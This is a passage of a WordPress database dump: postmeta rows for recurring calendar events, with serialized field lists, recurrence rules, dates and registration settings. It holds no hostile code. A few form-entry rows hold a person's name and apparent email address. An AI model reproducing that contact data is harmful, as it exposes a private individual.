12:00:00'),(122363,263252,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(119418,262744,'_EventOrigin','events-calendar'),(122381,263252,'_RTECmaxRegistrations','30'),(121712,263232,'_edit_lock','1610660102:2'),(121703,263232,'_RTECdeadlineType','start'),(119433,262744,'_EventTimezone','America/Denver'),(112711,262743,'_EventStartDate','2021-02-09 19:00:00'),(112712,262743,'_EventStartDateUTC','2021-02-10 02:00:00'),(112713,262743,'_EventEndDate','2021-02-09 20:00:00'),(115664,262791,'_EventCost',''),(122342,263251,'_RTECdeadlineType','start'),(122343,263251,'_RTECwhoCanRegister','any'),(119419,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(121709,263232,'_wp_old_slug','soul-travel-2-class'),(121701,263232,'protect_children',''),(121702,263232,'_RTECregistrationsDisabled','1'),(121685,263232,'boldgrid_hide_page_title','1'),(124573,263321,'_RTECmaxRegistrations','30'),(119415,262744,'_EventOrigin','events-calendar'),(114407,262789,'protect_children',''),(114408,262789,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607510537;s:12:\"_EventOrigin\";i:1607510537;s:10:\"_edit_last\";i:1607510564;s:10:\"post_title\";i:1607510580;s:11:\"post_status\";i:1607510705;s:12:\"post_content\";i:1607510705;s:16:\"tribe_events_cat\";i:1607536603;s:13:\"_thumbnail_id\";i:1607510705;s:26:\"_RTECregistrationsDisabled\";i:1607510705;s:17:\"_RTECdeadlineType\";i:1607510705;s:19:\"_RTECwhoCanRegister\";i:1607510705;s:23:\"_RTEClimitRegistrations\";i:1607510705;s:21:\"_RTECmaxRegistrations\";i:1607510705;s:24:\"boldgrid_hide_page_title\";i:1607510705;s:16:\"_EventRecurrence\";i:1607510705;s:17:\"_EventShowMapLink\";i:1607510705;s:13:\"_EventShowMap\";i:1607510705;s:13:\"_EventVenueID\";i:1607510705;s:15:\"_EventStartDate\";i:1607510705;s:13:\"_EventEndDate\";i:1607510705;s:18:\"_EventStartDateUTC\";i:1607510705;s:16:\"_EventEndDateUTC\";i:1607510705;s:14:\"_EventDuration\";i:1607510705;s:20:\"_EventCurrencySymbol\";i:1607510705;s:22:\"_EventCurrencyPosition\";i:1607510705;s:10:\"_EventCost\";i:1607510705;s:9:\"_EventURL\";i:1607510705;s:14:\"_EventTimezone\";i:1607510705;s:18:\"_EventTimezoneAbbr\";i:1607510705;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511405;}'),(121710,263232,'_wp_old_slug','the-easy-way'),(124564,263321,'_EventOrigin','events-calendar'),(121705,263232,'_RTEClimitRegistrations','0'),(124524,263319,'_EventOrigin','events-calendar'),(124525,263319,'_edit_lock','1619132077:2'),(121706,263232,'_RTECmaxRegistrations','30'),(124522,263319,'protect_children',''),(124523,263319,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1610629888;s:12:\"_EventOrigin\";i:1610629888;s:10:\"_edit_last\";i:1610629902;s:10:\"post_title\";i:1610629902;s:11:\"post_status\";i:1610629981;s:12:\"post_content\";i:1610629981;s:13:\"_thumbnail_id\";i:1610629981;s:26:\"_RTECregistrationsDisabled\";i:1610629981;s:17:\"_RTECdeadlineType\";i:1610629981;s:19:\"_RTECwhoCanRegister\";i:1610629981;s:23:\"_RTEClimitRegistrations\";i:1610629981;s:21:\"_RTECmaxRegistrations\";i:1610629981;s:24:\"boldgrid_hide_page_title\";i:1610629981;s:16:\"_EventRecurrence\";i:1610629981;s:17:\"_EventShowMapLink\";i:1610629981;s:13:\"_EventShowMap\";i:1610629981;s:13:\"_EventVenueID\";i:1610629981;s:15:\"_EventStartDate\";i:1610629981;s:13:\"_EventEndDate\";i:1610629981;s:18:\"_EventStartDateUTC\";i:1610629981;s:16:\"_EventEndDateUTC\";i:1610629981;s:14:\"_EventDuration\";i:1610629981;s:20:\"_EventCurrencySymbol\";i:1610629981;s:22:\"_EventCurrencyPosition\";i:1610629981;s:10:\"_EventCost\";i:1610629981;s:9:\"_EventURL\";i:1610629981;s:14:\"_EventTimezone\";i:1610629981;s:18:\"_EventTimezoneAbbr\";i:1610629981;}'),(121707,263232,'_EventVenueID','262507'),(128821,263454,'_field_99','kimberlyyoung@protonmail.com'),(128819,263454,'_field_97','Kimberly'),(128820,263454,'_field_98','Young'),(151781,266078,'passster_activate_global_protection',NULL),(120296,263018,'_RTECdeadlineType','start'),(119411,262743,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119705,262987,'_seq_num','61'),(119421,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119446,262744,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119434,262744,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119435,262744,'_dp_original','225321'),(119436,262744,'protect_children',''),(119437,262744,'_RTECregistrationsDisabled','1'),(119423,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(122328,263251,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122331,263251,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122336,263251,'_EventCost',''),(122309,263250,'_RTECmaxRegistrations','30'),(122286,263250,'_EventDuration','5400'),(122287,263250,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122282,263250,'_EventStartDate','2021-05-02 12:00:00'),(122283,263250,'_EventStartDateUTC','2021-05-02 18:00:00'),(122284,263250,'_EventEndDate','2021-05-02 13:30:00'),(122307,263250,'_RTECwhoCanRegister','any'),(122285,263250,'_EventEndDateUTC','2021-05-02 19:30:00'),(115665,262791,'_EventURL',''),(121704,263232,'_RTECwhoCanRegister','any'),(124526,263319,'_edit_last','2'),(119414,262744,'_EventOrigin','events-calendar'),(114409,262789,'_EventOrigin','events-calendar'),(122306,263250,'_RTECdeadlineType','start'),(122288,263250,'_EventOrigin','events-calendar'),(122289,263250,'_EventOrigin','events-calendar'),(122290,263250,'_EventOrigin','events-calendar'),(122291,263250,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(124528,263319,'_RTECregistrationsDisabled','1'),(124529,263319,'_RTECdeadlineType','start'),(122338,263251,'_EventTimezone','America/Denver'),(122339,263251,'_dp_original','201534'),(122302,263250,'_EventTimezone','America/Denver'),(122303,263250,'_dp_original','201534'),(122304,263250,'protect_children',''),(119709,262989,'_EventOrigin','events-calendar'),(122321,263251,'_EventEndDateUTC','2021-06-06 19:30:00'),(122327,263251,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122324,263251,'_EventOrigin','events-calendar'),(122325,263251,'_EventOrigin','events-calendar'),(122318,263251,'_EventStartDate','2021-06-06 12:00:00'),(122326,263251,'_EventOrigin','events-calendar'),(122319,263251,'_EventStartDateUTC','2021-06-06 18:00:00'),(122320,263251,'_EventEndDate','2021-06-06 13:30:00'),(112714,262743,'_EventEndDateUTC','2021-02-10 03:00:00'),(119956,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(112715,262743,'_EventDuration','3600'),(122358,263252,'_EventDuration','5400'),(122359,263252,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122356,263252,'_EventEndDate','2021-07-04 13:30:00'),(119707,262989,'protect_children',''),(119412,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(112797,262745,'_EventStartDate','2021-04-13 19:00:00'),(119426,262744,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119425,262744,'boldgrid_hide_page_title','1'),(128811,263450,'_field_133','Adam'),(119432,262744,'_EventURL',''),(119424,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(115650,262791,'_EventOrigin','events-calendar'),(119417,262744,'_EventOrigin','events-calendar'),(119430,262744,'_EventCurrencyPosition','prefix'),(115658,262791,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119445,262744,'_wp_old_slug','letters-of-light-and-sound-1-2'),(115659,262791,'_EventShowMapLink','1'),(151826,266081,'mec_end_time_minutes','0'),(114413,262789,'_RTECregistrationsDisabled','1'),(114414,262789,'_RTECdeadlineType','start'),(122164,263246,'_RTEClimitRegistrations','0'),(122165,263246,'_RTECmaxRegistrations','30'),(114417,262789,'_RTECmaxRegistrations','30'),(122308,263250,'_RTEClimitRegistrations','0'),(114456,262791,'_EventDuration','4200'),(122322,263251,'_EventDuration','5400'),(122313,263250,'_wp_old_slug','the-easy-way'),(122314,263250,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122295,263250,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122294,263250,'boldgrid_hide_page_title','1'),(122310,263250,'_EventVenueID','262507'),(122312,263250,'_wp_old_slug','soul-travel-2-class'),(122299,263250,'_EventCurrencyPosition','prefix'),(122300,263250,'_EventCost',''),(122301,263250,'_EventURL',''),(122293,263250,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122296,263250,'_EventShowMapLink','1'),(119714,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRe